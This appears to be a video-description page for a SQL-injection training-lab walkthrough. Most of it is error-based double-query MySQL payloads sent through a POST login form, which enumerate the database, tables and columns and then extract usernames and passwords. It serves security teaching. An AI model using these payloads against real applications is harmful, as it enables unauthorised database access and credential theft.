SQLi Dump Series 13 POST Double Injection Solution

Published 19, Aug 2018

0 251 Download

Description:
SQLi Dump Series 13 POST Double Injection Solution.

') #
') order by 2#
') union select 1,2#

union output not reflecting it's means it may be double query or error based. for this i will use hackbar.

AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

as we know not work in POST Based We Will Replace With space

database name : security

AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

') AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#

') AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(table_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 3,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#

we will extract users

you can change limit value to see the next data

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(column_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(column_name AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#

columns id, username ,password

let's extract username first.

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(username) AS CHAR),0x7e)) FROM security.users LIMIT 2,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)#

username is Dump,Angelina,Dummy

now let's extract password.

AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

') AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(password) AS CHAR),0x7e)) FROM security.users LIMIT 2,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) #

password : Dumb,I-kill-you,p@ssword

=======================================
username : Dump,Angelina,Dummy

password : Dumb,I-kill-you,p@ssword

in this manner you can extract columns data.

that's all for this video.

IF YOU LIKE THIS VIDEO. PLEASE DON'T FORGET TO LIKE SHARE AND SUBSCRIBE OUR CHANNEL.

THANKS FOR WATCHING.

Releted More Videos

12:17 428

SQLi Dump Series 14 POST Double Injection Solution
Shahzad Haxor

SQLi Dump Series 13 POST Double Injection Solution

Releted More Videos

You May Also Like